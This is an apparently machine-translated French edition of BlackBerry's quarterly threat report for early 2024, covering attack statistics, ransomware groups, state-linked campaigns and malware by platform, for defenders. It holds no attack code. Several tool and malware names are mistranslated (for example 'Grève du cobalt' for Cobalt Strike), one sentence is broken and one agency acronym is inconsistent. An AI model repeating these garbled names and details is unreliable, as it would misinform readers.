Des renseignements utiles qui comptent
Ce rapport BlackBerry fournit un examen complet du paysage mondial des menaces pour la période allant de janvier à mars 2024. Les points forts du rapport sont les suivants :
Nous avons observé plus de 630 000 hachages malveillants, soit une augmentation de plus de 40 % par minute par rapport à la période précédente.
Pour en savoir plus, consultez lasection Total des attaques au cours de cette période.
60 % des attaques ont visé des infrastructures critiques. Parmi celles-ci, 40 % visaient le secteur financier.
Pour en savoir plus, consultez la page Infrastructures critiques critiques.
56 % des CVE ont reçu une note de 7,0 ou plus (10 étant la note la plus élevée). Les CVE ont été rapidement utilisés dans toutes les formes de logiciels malveillants, en particulier les ransomwares et les voleurs d'informations.
Pour en savoir plus, consultez lasection Common Vulnerabilities and Exposures (Vulnérabilités et expositions courantes).
Nouvelle section sur les ransomwares : Nous avons ajouté une nouvelle section sur les principaux groupes de ransomwares dans le monde et sur les ransomwares les plus actifs au cours de cette période.
Pour en savoir plus, consultez la section "Who's Who in Ransomware".
Les rapports de veille sur les menaces mondiales ( BlackBerry® Global Threat Intelligence Reports) sont publiés tous les trois mois. Ces mises à jour fréquentes permettent aux RSSI et autres décideurs clés de rester informés des menaces et des défis les plus récents en matière de cybersécurité dans leur secteur d'activité et leur zone géographique.
Ce rapport est l'aboutissement des recherches, des analyses et des conclusions de notre équipe Cyber Threat Intelligence (CTI), de notre équipe Incident Response (IR) et des spécialistes de la sécurité de notre division CylanceMDR™. Continuez à défiler pour en savoir plus, télécharger le pdf ou lire la note de synthèse.
Nombre total d'attaques au cours de cette période
Comme vous le constaterez dans ce rapport, le nombre total d'attaques n'est pas nécessairement en corrélation avec le nombre de hachages uniques (nouveaux logiciels malveillants). Comme l'illustrent les figures 2 à 6 des deux sections suivantes, toutes les attaques n'utilisent pas des logiciels malveillants uniques. Cela dépend de la motivation de l'attaquant, de la complexité de l'attaque et de l'objectif - par exemple, le vol d'informations ou le vol financier.
BlackBerry Les solutions de cybersécurité ont permis d'arrêter plus de 3 100 000 cyberattaques, soit plus de 37 000 cyberattaques par jour.
Attaques par pays
Attaques stoppées
La figure 2 ci-dessous présente les cinq pays où les solutions de cybersécurité BlackBerry ont permis d'éviter le plus grand nombre de cyberattaques. C'est aux États-Unis que les organisations utilisant les solutions BlackBerry ont subi le plus grand nombre de tentatives d'attaques au cours de la période considérée. Dans la région Asie-Pacifique (APAC), le Japon, la Corée du Sud et l'Australie ont également subi un niveau élevé d'attaques, ce qui leur a valu de figurer dans notre top cinq. En Amérique latine (LATAM), les clients du Honduras ont été fortement ciblés, ce qui a valu à ce pays la cinquième place de notre liste.
Malware unique
Au cours de cette période, BlackBerry a observé une augmentation de plus de 40 % par minute des nouveaux hachages (logiciels malveillants uniques), par rapport à la période allant de septembre à décembre 2023 (figure 1). La figure 2 montre les cinq pays où les solutions de cybersécurité BlackBerry ont enregistré le plus grand nombre de hachages uniques de logiciels malveillants, les États-Unis recevant le plus grand nombre. La Corée du Sud, le Japon et l'Australie, dans la région Asie-Pacifique, ont conservé leur classement des trois derniers mois, tandis que le Brésil fait son entrée dans la liste.
Comme nous le verrons dans les sections suivantes, d'autres attaquants peuvent vouloir endommager une infrastructure physique, telle qu'un service public, en exploitant une vulnérabilité dans les systèmes de contrôle ou en infectant un appareil sur le réseau
Attaques par secteur d'activité
Comme dans notre précédent rapport, nous avons regroupé plusieurs secteurs industriels clés en deux sections : Infrastructures critiques et Entreprises commerciales.
Les infrastructures critiques, telles que définies par l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA), englobent 16 secteurs, dont les soins de santé, l'administration, l'énergie, l'agriculture, la finance et la défense.
La numérisation croissante de ces secteurs rend leurs actifs plus vulnérables aux cybercriminels. Les acteurs de la menace exploitent activement les systèmes critiques par le biais de vulnérabilités telles que les erreurs de configuration des systèmes et les campagnes d'ingénierie sociale à l'encontre des employés.
Les entreprises commerciales comprennent l'industrie manufacturière, les biens d'équipement, les services commerciaux et professionnels et la vente au détail. Les entreprises sont toujours des cibles tentantes pour les cyberattaques, et l'utilisation accrue d'appareils connectés et de l'informatique en nuage a facilité l'intrusion dans leurs systèmes. Les attaquants sont également devenus plus sophistiqués, utilisant souvent l'ingénierie sociale pour obtenir des informations d'identification et distribuer des logiciels malveillants.
Cyber Story Highlight : les banques internationales
Les banques mexicaines et les plateformes de crypto-monnaies ciblées par le RAT AllaKore
En janvier, les analystes en cybermenaces de BlackBerry ont découvert une campagne de longue haleine à motivation financière visant les banques mexicaines et les plateformes d'échange de crypto-monnaies à l'aide du RAT AllaKore, un outil d'accès à distance open-source modifié. Les acteurs de la menace ont utilisé des leurres imitant l'Institut mexicain de sécurité sociale (IMSS) et des documents légitimes pour distraire les utilisateurs pendant le processus d'installation, ce qui leur a permis de voler des identifiants bancaires et des informations d'authentification. Cette campagne est en cours depuis 2021 et se concentre sur les grandes entreprises mexicaines dont le chiffre d'affaires est supérieur à 100 millions de dollars. BlackBerry Les résultats de l'étude suggèrent que l'acteur de la menace est probablement basé en Amérique latine, étant donné l'utilisation d'adresses IP Mexico Starlink et d'instructions en espagnol dans la charge utile du RAT. Pour en savoir plus, lisez l'article complet sur notre blog.
Menaces sur les infrastructures critiques
D'après notre télémétrie interne, 60 % des cyberattaques spécifiques à un secteur d'activité auxquelles les solutions de cybersécurité de BlackBerry ont été confrontées visaient des infrastructures critiques. En outre, 32 % des hachages uniques de logiciels malveillants visaient des locataires d'infrastructures critiques.
CylanceENDPOINT™ et d'autres solutions de cybersécurité BlackBerry ont stoppé plus de 1,1 million d'attaques contre des secteurs industriels critiques, qui comprennent la finance, les soins de santé, le gouvernement et les services publics. Près de la moitié de ces 1,1 million d'attaques concernaient le secteur de la finance. En outre, les organisations gouvernementales et publiques ont subi la plus grande diversité d'attaques, avec plus de 36 % des hachages uniques ciblant ce secteur.
BlackBerry a enregistré plusieurs familles de logiciels malveillants ciblant des infrastructures critiques dans le monde entier. Par exemple, le célèbre voleur d'informations LummaStealer a été observé en ciblant spécifiquement les secteurs de l'alimentation et de l'agriculture en Amérique latine et le secteur de l'énergie dans la région APAC. Parmi les menaces notables observées au cours de la période couverte par ce rapport, citons
- 8Base ransomware: Opération de ransomware dans le secteur de la santé
- Amadey (Amadey Bot): Réseau de zombies multifonctionnel pour les installations gouvernementales
- Buhti: Opération Ransomware | Immobilier d'entreprise
- LummaStealer (LummaC2): Secteur de l'alimentation et de l'agriculture (LATAM) et secteur de l'énergie (APAC)
- PrivateLoader: Famille de téléchargeurs | Secteur de l'énergie
- Remcos (RemcosRAT): Outil d'accès à distance (RAT) de qualité commerciale | Secteur de l'alimentation et de l'agriculture
- Vidar (VidarStealer): Infopresseurs sur les matières premières | Divers secteurs :
- Le secteur de l'énergie dans les pays de l'APAC
- Le secteur des technologies de l'information dans les pays du LATAM
- Le secteur des services financiers en Amérique du Nord
- Le secteur des installations gouvernementales en Europe, au Moyen-Orient et en Afrique (EMEA)
Des informations détaillées sur ces menaces pesant sur les infrastructures critiques sont disponibles en annexe.
Menaces extérieures pesant sur les infrastructures critiques
Les menaces externes sont des cyberattaques enregistrées en dehors de la télémétrie interne de BlackBerry. Au cours de la dernière période de référence, le paysage mondial des menaces a connu un certain nombre d'attaques notables contre des infrastructures critiques.
Les conséquences de la faille survenue fin 2023 à l'Idaho National Laboratory (INL), un centre de recherche du ministère américain de l'énergie, se poursuivent. Des pirates ont pénétré dans la plateforme de gestion des ressources humaines Oracle HCM, basée sur le cloud, et ont siphonné les données personnelles de plus de 45 000 personnes. Le groupe hacktiviste SiegedSec a revendiqué l'attaque dans les semaines qui ont suivi et a publié une partie des données volées sur un forum de fuites en ligne. La figure 7 présente une chronologie des menaces notables contre les infrastructures critiques qui se sont produites au cours de la période couverte par le présent rapport.
Points forts de la cyberhistoire : infrastructure, réseaux privés virtuels et confiance zéro
Une directive d'urgence révèle qu'il est peut-être temps de remplacer les VPN
La fonctionnalité de base des réseaux privés virtuels (VPN) est restée largement inchangée depuis leur création en 1996, mais les récentes violations de sécurité très médiatisées et les directives gouvernementales suggèrent qu'il est peut-être temps de reconsidérer leur utilisation.
L'un des principaux problèmes est le modèle "trust but verify" des VPN, qui accorde intrinsèquement la confiance aux utilisateurs à l'intérieur du périmètre du réseau, ce qui les rend vulnérables aux cyberattaques. Soulignant ce risque, l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA) a récemment publié des directives d'urgence concernant les vulnérabilités critiques des VPN, appelant à une déconnexion rapide des produits à risque. Lisez l'article complet sur notre blog.
Menaces pour les entreprises commerciales
Tout comme les industries sont touchées par les menaces de cybersécurité, les entreprises individuelles luttent également contre les cyberattaques, d'autant plus qu'elles ont tendance à s'appuyer davantage sur l'infrastructure numérique pour les finances, les communications, les ventes, l'approvisionnement et d'autres opérations commerciales. Toutes les entreprises, des start-ups aux conglomérats multinationaux, sont exposées aux cybermenaces, en particulier aux ransomwares.
Au cours de la dernière période de référence, les solutions de cybersécurité de BlackBerry ont bloqué 700 000 attaques ciblant des industries du secteur des entreprises commerciales.
D'après notre télémétrie interne, par rapport à la période précédente, les entreprises commerciales ont vu :
- une augmentation de deux pour cent du nombre d'attaques auxquelles ils ont été confrontés.
- une augmentation de 10 % des hachages uniques rencontrés.
Les entreprises commerciales sont menacées par des voleurs d'informations vendus par le biais d'opérations de logiciels malveillants en tant que service (MaaS). Souvent, ces menaces déploient des logiciels malveillants supplémentaires sur l'appareil de la victime. Ils continuent d'évoluer dans une course aux armements cybernétiques pour contourner les produits de sécurité et les logiciels antivirus traditionnels. Les logiciels malveillants les plus répandus relevés dans la télémétrie de BlackBerry sont les suivants :
- RedLine (voleur de RedLine) : voleur d'infos
- SmokeLoader : Logiciel malveillant polyvalent couramment utilisé
- PrivateLoader : Facilitateur de logiciels malveillants
- RaccoonStealer : MaaS infostealer
- LummaStealer (LummaC2): voleur d'informations sur les logiciels malveillants
Des informations détaillées sur ces menaces pesant sur les entreprises commerciales sont disponibles en annexe.
Menaces externes auxquelles est confrontée l'entreprise commerciale
Les ransomwares sont un fléau pour les organisations de toutes tailles et de toutes orientations. Parmi les exemples récents d'attaques par ransomware, on peut citer
- VF Corporation - fabricant américain de marques de vêtements de sport bien connues telles que Timberland, The North Face et Vans - a été victime d'une attaque de ransomware par le gang de ransomware ALPHV en décembre 2023. Les attaquants ont volé les données de plus de 35 millions de clients, ce qui a entraîné des retards dans l'exécution des commandes et d'autres perturbations pendant la période très importante des fêtes de fin d'année.
- Coop Värmland, une chaîne de supermarchés suédoise, a vu ses fêtes de fin d'année perturbées par une attaque de ransomware perpétrée par le gang de ransomware Cactus.
- Un célèbre fabricant allemand, ThyssenKrupp, a été victime d'une brèche dans sa subdivision automobile en février 2024. L'entreprise a déclaré par la suite qu'il s'agissait d'une attaque de ransomware qui avait échoué.
- En mars, le groupe de ransomware Stormous a attaqué la brasserie belge Duvel Moortgat, qui produit plus de 20 marques de bière, et a volé 88 Go de données.
Qui est qui en matière de ransomware ?
Comme le montrent les événements ci-dessus, les ransomwares ont constitué une menace prépondérante sur l'ensemble dusite BlackBerry Global Threat Intelligence Report (Rapport mondial de veille sur les menaces). Pour ce rapport, nous avons introduit une section spécifique sur les groupes de ransomwares actifs au cours de cette période.
Le ransomware est un outil universel adopté par les cybercriminels et les syndicats organisés, qui ciblent des victimes dans tous les secteurs d'activité à travers le monde. La plupart de ces groupes sont motivés par des raisons financières ; ils adaptent rapidement de nouvelles tactiques et techniques pour échapper aux défenses traditionnelles de la cybersécurité et exploiteront rapidement toute nouvelle faille de sécurité.
Les ransomwares ciblent de plus en plus les organismes de santé, une tendance inquiétante. La santé est un secteur rentable pour les groupes de ransomwares en raison de la numérisation croissante des dossiers médicaux et des graves conséquences qui peuvent survenir si ces services sont interrompus. Avec des attaques notables dans le monde entier au cours de cette période, ces syndicats agressifs peuvent mettre des vies en danger et restreindre ou couper l'accès des travailleurs de la santé aux données cruciales des informations personnelles identifiables (PII) des patients.
Les attaques contre les soins de santé peuvent avoir de graves répercussions, en paralysant les hôpitaux, les cliniques, les pharmacies et les dispensaires, en empêchant les patients d'obtenir des médicaments vitaux, en provoquant le réacheminement des ambulances et en perturbant la programmation des procédures médicales. Parmi les conséquences secondaires, on peut citer les fuites de données et la vente d'informations sensibles sur les patients sur le dark web. C'est pourquoi nous prévoyons que les soins de santé continueront d'être fortement ciblés, à la fois publiquement et en privé, tout au long de l'année 2024.
Principaux acteurs de la lutte contre les rançongiciels au cours de la période considérée
Voici les groupes de menaces de ransomware les plus importants du monde entier qui ont été actifs au cours de la période considérée :
Hunters International
Hunters International, un syndicat du crime spécialisé dans les ransomwares en tant que service (RaaS) qui opère depuis la fin de l'année 2023, s'est fait connaître au début de l'année 2024. Ce groupe est peut-être une émanation du groupe de ransomwares Hive, qui a été démantelé par les forces de l'ordre au début de l'année 2023. Ce groupe utilise un double système d'extorsion qui consiste d'abord à crypter les données de la victime pour obtenir une rançon, puis à exiger davantage d'argent en menaçant de publier les données volées. Hunters International est actuellement actif dans le monde entier.
8Base
Observé initialement en 2022, le groupe de ransomwares 8Base s'est imposé à la fin de l'année 2023. Ce groupe prolifique utilise une variété de tactiques, de techniques et de procédures (TTP) et peut être très opportuniste. Le groupe est souvent prompt à exploiter les vulnérabilités récemment divulguées et utilise divers ransomwares, dont Phobos.
LockBit
LockBit, un groupe de ransomware basé en Russie, est spécialisé dans la fourniture de RaaS via son malware éponyme. Découvert en 2020, le ransomware LockBit est devenu l'un des groupes de ransomware les plus agressifs. Parmi les aspects de ce logiciel, on peut citer
- Outils personnalisés pour exfiltrer les données des victimes avant le chiffrement et les héberger via un site de fuite sur le dark web.
- S'adresse principalement aux victimes d'Amérique du Nord et, accessoirement, à celles de la région Amérique latine et Caraïbes.
- Emploie une double stratégie d'extorsion.
En février 2024, l'opération Cronos, une opération internationale d'application de la loi, a perturbé les opérations de LockBit. Toutefois, LockBit semble avoir rebondi depuis et reste un acteur majeur dans le domaine des ransomwares.
Play
Observé initialement en 2022, Play est un groupe de ransomware à extorsion multiple qui héberge les données volées sur des sites basés sur TOR qui permettent une communication anonyme, menaçant de divulguer les données si le paiement de la rançon n'est pas effectué. Play cible souvent les petites et moyennes entreprises (PME), principalement en Amérique du Nord, mais aussi dans la région EMEA au cours de la période couverte par le présent rapport. Le groupe utilise principalement des outils prêts à l'emploi tels que Cobalt Strike, Empire et Mimikatz pour la découverte et les TTP de mouvement latéral. Le groupe a également utilisé Grixba, un outil personnalisé de reconnaissance et de vol d'informations utilisé avant l'exécution d'un ransomware.
BianLian
BianLian est un ransomware basé sur GoLang qui sévit depuis 2022. Le groupe associé a été actif au cours de la période considérée, ciblant principalement les victimes basées en Amérique du Nord. Comme de nombreux groupes de ransomwares, BianLian exploite largement les vulnérabilités récemment divulguées, ciblant souvent les petites entreprises dans un certain nombre de secteurs d'activité. Il utilise divers outils prêts à l'emploi, notamment PingCastle, Advance Port Scanner et SharpShares, pour prendre pied sur un système cible avant d'exfiltrer des données sensibles et d'exécuter un ransomware. Ces données volées sont ensuite utilisées comme tactique d'extorsion jusqu'à ce que la rançon soit payée.
ALPHV
Souvent appelée BlackCat ou Noberus, ALPHV est une opération RaaS qui existe depuis la fin de l'année 2021. Le groupe de menace derrière ALPHV est très sophistiqué et utilise le langage de programmation Rust pour cibler les systèmes d'exploitation Windows, Linux et VMWare. ALPHV a tendance à cibler les victimes nord-américaines.
Les groupes de ransomware [...] adaptent rapidement de nouvelles tactiques et techniques pour échapper aux défenses traditionnelles de la cybersécurité et exploitent rapidement toute nouvelle faille de sécurité.
Cyber Story Highlight : Ransomware et soins de santé
12 jours sans revenus : Les retombées du ransomware se poursuivent dans le secteur de la santé
En mars, le secteur de la santé a subi une attaque de ransomware "sans précédent" qui a perturbé les activités des hôpitaux et des pharmacies, selon l'American Hospital Association (AHA). L'attaque contre Change Healthcare, qui traite 15 milliards de transactions de soins de santé par an, a gravement affecté les services de soins aux patients tels que l'aide à la décision clinique et les opérations pharmaceutiques. Cette perturbation a entraîné une paralysie des revenus pendant 12 jours pour les cabinets médicaux touchés et a laissé les patients dans l'impossibilité d'obtenir des ordonnances vitales. Alors que le Bureau des droits civils du ministère américain de la santé et des services sociaux mène actuellement une enquête, les dernières données révèlent une augmentation significative des cyber-menaces, avec une hausse de 256 % des grandes brèches de piratage au cours des cinq dernières années. Cet incident souligne la nécessité de renforcer les mesures de cybersécurité dans le secteur des soins de santé. Pour une exploration détaillée de cette question urgente, lisez l'article complet sur notre blog.
Analyse géopolitique et commentaires
Les conflits géopolitiques sont de plus en plus souvent à l'origine de cyberattaques. Les technologies numériques peuvent être de puissants outils au service du bien, mais elles peuvent aussi être utilisées de manière abusive par des acteurs étatiques et non étatiques. Au cours des trois premiers mois de 2024, des législateurs d'Europe, d'Amérique du Nord et de la région Asie-Pacifique ont été victimes de campagnes ciblées de logiciels espions. Des acteurs menaçants se sont introduits dans les systèmes informatiques de plusieurs ministères, ont compromis des systèmes militaires et ont perturbé des infrastructures essentielles dans le monde entier.
Si les motifs de ces intrusions sont souvent complexes et opaques, les incidents récents les plus significatifs ont impliqué des clivages géopolitiques majeurs tels que l'invasion de l'Ukraine par la Russie, l'agression croissante entre Israël et l'Iran, et les tensions actuelles en mer de Chine méridionale et dans la région indo-pacifique.
En Ukraine, les dimensions cybernétiques de la guerre se poursuivent. Contrairement aux normes internationales régissant la conduite légale dans le cyberespace, les attaques lancées contre l'Ukraine ne font toujours pas la distinction entre les infrastructures civiles et militaires. En janvier, des agents russes se sont connectés à des webcams résidentielles à Kiev, prétendument pour recueillir des informations sur les systèmes de défense aérienne de la ville avant de lancer une attaque de missiles sur la ville. Selon les rapports, les attaquants ont manipulé les angles des caméras pour recueillir des informations sur les infrastructures critiques situées à proximité afin de mieux cibler les missiles.
Des acteurs russes de la cybermenace ont également été associés à une attaque contre le plus grand fournisseur de téléphonie mobile d'Ukraine, Kyivstar, qui a détruit d'importantes infrastructures et coupé l'accès à 24 millions de clients en Ukraine. Cette attaque a eu lieu quelques heures avant que le président Biden ne rencontre le président Zelenskyy à Washington D.C. Des législateurs de l'UE ont également découvert que leurs téléphones avaient été infectés par des logiciels espions. Nombre d'entre eux étaient membres de la sous-commission "sécurité et défense" du Parlement européen, chargée de formuler des recommandations sur le soutien de l'UE à l'Ukraine. En mars, des attaquants russes ont également intercepté des conversations entre des responsables militaires allemands au sujet d'un éventuel soutien militaire à l'Ukraine, ce qui renforce la nécessité de protéger les communications contre des tentatives d'espionnage accrues.
L'escalade des activités militaires entre l'Iran et Israël s'est accompagnée de cyberattaques contre les sites du gouvernement israélien. En représailles, les acteurs de la menace israéliens ont perturbé 70 % des stations-service en Iran. Dans le même temps, les États-Unis ont lancé une cyberattaque contre un navire espion militaire iranien en mer Rouge qui partageait des renseignements avec les rebelles houthis.
Dans la région indo-pacifique, les cyberattaques et les campagnes d'espionnage attribuées à des groupes soutenus par la Chine ont continué à se multiplier. Le Conseil d'examen de la cybersécurité du ministère américain de la sécurité intérieure a publié un rapport important sur l'incident Microsoft Online Exchange de l'été 2023, qui décrit en détail comment des attaquants soutenus par la Chine ont volé le code source de Microsoft. Le groupe de menace Storm-0558 a compromis des employés et des fonctionnaires du Département d'État américain, du Département du commerce américain, de la Chambre des représentants des États-Unis et de plusieurs ministères du Royaume-Uni. Selon le rapport, l'acteur de la menace a réussi à télécharger environ 60 000 courriels du seul Département d'État.
Il ne s'agit pas d'un incident isolé. En mars 2024, le ministère américain de la justice et le FBI ont révélé que des attaquants chinois avaient pris pour cible plusieurs membres britanniques, européens, américains et canadiens de l'Alliance interparlementaire sur la Chine.
Comme indiqué précédemment, les attaques contre les infrastructures critiques ont augmenté, en particulier dans les secteurs de la finance et de la santé. Au cours des trois premiers mois de 2024, une violation massive des données d'une compagnie d'assurance maladie française a entraîné la fuite d'informations personnelles sensibles. Au Canada, le Centre d'analyse des opérations et déclarations financières (CANAFE) a fermé ses systèmes à la suite d'un cyberincident. Le gouvernement canadien a réagi en allouant 27 millions de dollars canadiens à l'amélioration de la cyber-résilience du CANTRAC et à la mise en place de mesures de protection de la sécurité des données.
Les gouvernements du monde entier investissent dans le renforcement de la cybersécurité face à l'augmentation du cyberespionnage et des tentatives de cyberattaque. Le Canada a récemment annoncé des niveaux d'investissement historiques dans ses cyberdéfenses, et le Royaume-Uni a porté ses dépenses de défense à 2,5 % de son PIB. La cybersécurité reste l'un des principaux risques pour les gouvernements et les acteurs du secteur privé, et cette tendance se poursuivra probablement tant que les tensions géopolitiques continueront à augmenter.
Observations sur la réponse aux incidents
Observations de l'équipe de réponse aux incidents BlackBerry
Voici un résumé des types de missions de RI auxquelles l'équipe BlackBerry a répondu, ainsi que des mesures de sécurité que les organisations peuvent prendre pour prévenir de telles violations.
- Intrusion dans le réseau : Incidents dans lesquels le vecteur d'infection initial était un système vulnérable orienté vers l'internet, tel qu'un serveur web ou un appareil de réseau privé virtuel (VPN). Dans certains cas, la violation a conduit au déploiement d'un ransomware dans l'environnement de la cible et à l'exfiltration de données.
- Prévention : Appliquer les mises à jour de sécurité à tous les systèmes exposés à Internet en temps opportun. (MITRE - External Remote Services, T1133.)
- Manquement d'initié : Un employé actuel et/ou un ancien employé a accédé aux ressources de l'entreprise sans autorisation.
- Prévention : Mettre en place des contrôles de sécurité par authentification forte sur tous les systèmes. Mettre en œuvre des procédures formelles d'intégration des employés de l'entreprise. (MITRE - Comptes valides : Comptes dans le nuage, T1078.004.)
- Ransomware : Dix pour cent de tous les incidents auxquels il a été répondu étaient dus à des ransomwares.
- Prévention : Apporter en temps utile des correctifs aux services orientés vers l'internet, tels que le courrier électronique, les réseaux privés virtuels et les serveurs web. Cela peut empêcher un acteur de la menace d'accéder à des objectifs et d'y donner suite, comme le déploiement d'un ransomware, après avoir accédé à un réseau d'entreprise par le biais d'un appareil ou d'un système vulnérable. (MITRE - External Remote Services, T1133.)
- Prévention : Veiller à ce que l'organisation dispose de deux copies de toutes les données critiques stockées sur deux supports différents de la source de données d'origine, avec au moins une copie hors site.
La détection, l'endiguement et le rétablissement d'un incident de cybersécurité nécessitent une détection et une réponse rapides pour limiter les dommages. Il est impératif que les organisations disposent d'un plan de réponse aux incidents bien documenté, ainsi que d'un personnel formé et de ressources prêtes à prendre des mesures immédiates dès les premiers signes d'une violation potentielle. Cela permet aux équipes de sécurité de détecter les problèmes le plus tôt possible, de contenir et d'éradiquer rapidement les menaces et d'atténuer l'impact sur la réputation de l'entreprise et de la marque, les pertes financières et les risques juridiques pour l'organisation.
Acteurs de la menace et outils
Acteurs de la menace
Des dizaines de groupes de menace ont lancé des cyberattaques au cours des trois premiers mois de 2024. Nous avons mis en évidence les attaques les plus percutantes.
LockBit
En février, le NCA, le FBI et Europol, dans le cadre d'un effort mondial coordonné baptisé "Operation Cronos", ont mis en place un système de surveillance de l'environnement.Opération Cronosont collaboré avec les services répressifs de dix pays pour prendre le contrôle de l'infrastructure et du site de fuite du groupe LockBit, recueillir des informations sur ses serveurs, procéder à des arrestations et imposer des sanctions.
Cependant, moins d'une semaine plus tard, le groupe de ransomware s'est regroupé et a repris ses attaques, en utilisant des cryptomonnaies mises à jour et des notes de rançon qui dirigent les victimes vers de nouveaux serveurs à la suite de l'interruption de l'action des forces de l'ordre.
LockBit a revendiqué la responsabilité de cyberattaques contre divers réseaux, dont le réseau hospitalier Capital Health. Dans les deux cas, ils ont menacé de divulguer des données confidentielles si une rançon n'était pas payée rapidement.
Rhysida
APT29
La CISA a récemment averti qu'APT29 avait élargi son champ d'action à d'autres secteurs d'activité et à d'autres administrations locales. Connu pour utiliser un large éventail de logiciels malveillants personnalisés, le groupe de menace a également récemment ciblé des services en nuage en utilisant des comptes de service compromis ou des jetons d'authentification volés.
Au cours de cette période, APT29 a été observé en train d'accéder à un compte de locataire test de Microsoft suite à une attaque par pulvérisation de mot de passe, puis de créer des applications OAuth malveillantes pour accéder à des comptes de messagerie d'entreprise. En outre, ils ont ciblé des partis politiques allemands avec WINELOADER, une porte dérobée observée pour la première fois en janvier 2024.
Akira
Akira est connu pour utiliser des outils tels que :
- AdFind pour l'interrogation d'Active Directory.
- Mimikatz et LaZagne pour l'accès aux informations d'identification.
- Ngrok pour l'accès à des réseaux derrière des pare-feu ou d'autres mesures de sécurité.
- AnyDesk pour l'accès à distance.
- Scanner IP avancé pour localiser les appareils sur un réseau.
Principaux outils utilisés par les acteurs de la menace
Mimikatz
Grève du cobalt
Ngrok
ConnectWise
Menaces prévalentes par plate-forme : Windows
Remcos
Trojan d'accès à distance
Remcos, abréviation de Remote Control and Surveillance (contrôle et surveillance à distance), est une application utilisée pour accéder à distance à l'appareil d'une victime.
Agent Tesla
Voleur d'informations
L'agent Tesla est un cheval de Troie basé sur .NET qui est souvent vendu en tant que MaaS et qui est principalement utilisé pour la collecte d'informations d'identification.
RedLine
Voleur d'informations
Le logiciel malveillant RedLine utilise un large éventail d'applications et de services pour exfiltrer illicitement les données des victimes, telles que les informations relatives aux cartes de crédit, les mots de passe et les cookies.
RisePro
Voleur d'informations
Alors que des variantes actualisées de RisePro ont été observées dans notre dernier rapport, le voleur d'informations a fait l'objet d'une nouvelle campagne et a été faussement distribué en tant que "logiciel craqué" sur des dépôts GitHub au cours de la période couverte par le présent rapport.
Chargeur de fumée
Porte dérobée
SmokeLoader est un logiciel malveillant modulaire utilisé pour télécharger d'autres charges utiles et voler des informations. Il a été observé pour la première fois en 2011, mais reste une menace active à ce jour.
Prometei
Cryptocurrency Miner/Botnet
Prometei est un botnet de crypto-monnaies multi-étapes et multiplateformes qui cible principalement les pièces de monnaie Monero. Il peut adapter sa charge utile pour cibler les plateformes Linux ou Windows. Prometei a été utilisé avec Mimikatz pour se propager au plus grand nombre de points d'accès possible.
Buhti
Ransomware
Buhti est un ransomware qui utilise des variantes existantes d'autres logiciels malveillants tels que LockBit ou Babuk pour cibler les systèmes Linux et Windows.
Menaces prévalentes par plate-forme : Linux
XMRig
Cryptocurrency Miner
XMRig continue d'être répandu au cours de la période couverte par ce rapport. Le mineur cible Monero tout en permettant à l'acteur de la menace d'utiliser le système d'une victime pour miner de la crypto-monnaie à son insu.
NoaBot/Mirai
Déni de service distribué (DDoS)
NoaBot est une variante légèrement plus sophistiquée de Mirai. Il bénéficie de techniques d'obscurcissement améliorées par rapport à Mirai et utilise SSH pour se propager plutôt que Telnet. Il est également compilé avec uClibc au lieu de GCC, ce qui rend la détection difficile.NoaBot/Mirai
XorDDoS
DDoS
Fréquemment observé dans notre télémétrie, XorDDoS est un cheval de Troie malveillant qui cible les appareils fonctionnant sous Linux et qui coordonne les réseaux de zombies infectés par le biais d'instructions C2. Il tire son nom de l'utilisation du chiffrement XOR pour contrôler l'accès aux données d'exécution et de communication.
AcidPour
Essuie-glace
Bien qu'elle ne soit pas présente dans notre télémétrie, une nouvelle version de l'effaceur de données AcidPour a été observée dans la nature. La dernière version du logiciel malveillant, qui est utilisé pour effacer les fichiers sur les routeurs et les modems, est conçue pour cibler spécifiquement les appareils Linux x86.
Menaces prévalentes par plate-forme : MacOS
RustDoor
Porte dérobée
RustDoor est un logiciel malveillant à porte dérobée basé sur Rust qui est principalement distribué sous la forme de mises à jour de programmes légitimes. Le logiciel malveillant se propage sous forme de binaires FAT contenant des fichiers Mach-o.
Voleur atomique
Voleur d'informations
Le voleur atomique (AMOS) reste répandu avec une nouvelle version repérée dans la nature. La dernière version du voleur intègre un script Python pour passer inaperçu. AMOS cible les mots de passe, les cookies des navigateurs, les données de remplissage automatique, les portefeuilles de cryptomonnaie et les données du trousseau de clés du Mac.
Transfert d'Empire
Voleur d'informations
Un voleur d'informations découvert par Moonlock Lab en février 2024. Il peut s'autodétruire lorsqu'il détecte qu'il s'exécute dans un environnement virtuel. Cela permet au logiciel malveillant de ne pas être détecté et rend l'analyse plus difficile pour les défenseurs. Empire Transfer cible les mots de passe, les cookies de navigateur et les portefeuilles cryptographiques, et utilise des tactiques similaires à celles d'Atomic Stealer (AMOS).
Menaces prévalentes par plateforme : Android
SpyNote
Voleur d'informations/RAT
SpyNote utilise le service d'accessibilité d'Android pour capturer les données de l'utilisateur et les envoyer à un serveur C2.
Anatsa/Teabot
Voleur d'informations
Principalement distribué par l'intermédiaire du Google Play store sous forme d'applications de type cheval de Troie. Après l'infection initiale par l'application de Troie, Anatsa télécharge d'autres fichiers malveillants sur l'appareil de la victime à partir d'un serveur C2.
Vultur
Voleur d'informations/RAT
Découvert pour la première fois en 2021, Vultur a été distribué par le biais d'applications de chevaux de Troie et de techniques d'ingénierie sociale de type "smishing" (hameçonnage par SMS). Outre l'exfiltration de données, un acteur de la menace peut également apporter des modifications au système de fichiers, modifier les autorisations d'exécution et contrôler l'appareil infecté à l'aide des services d'accessibilité Android.
Coper/Octo
Voleur d'informations/RAT
Une variante de la famille Exobot. Présenté sous la forme d'un produit MaaS, ses capacités comprennent l'enregistrement des frappes, la surveillance des SMS, le contrôle de l'écran, l'accès à distance et l'opération C2.
Vulnérabilités et expositions courantes
Les vulnérabilités et expositions communes (CVE) fournissent un cadre pour l'identification, la normalisation et la publication des vulnérabilités et expositions connues en matière de sécurité. Comme indiqué précédemment, les cybercriminels utilisent de plus en plus les CVE pour pénétrer dans les systèmes et voler des données. Au cours de cette période, de nouvelles vulnérabilités découvertes dans les produits Ivanti, ConnectWise, Fortra et Jenkins ont offert aux acteurs malveillants de nouveaux moyens de cibler les victimes. En outre, les derniers mois ont démontré les risques d'attaques de la chaîne d'approvisionnement qui pourraient être présents dans les projets open-source avec la porte dérobée XZ, qui avait été intentionnellement placée dans XZ Utils, un utilitaire de compression de données disponible sur presque toutes les installations de Linux.
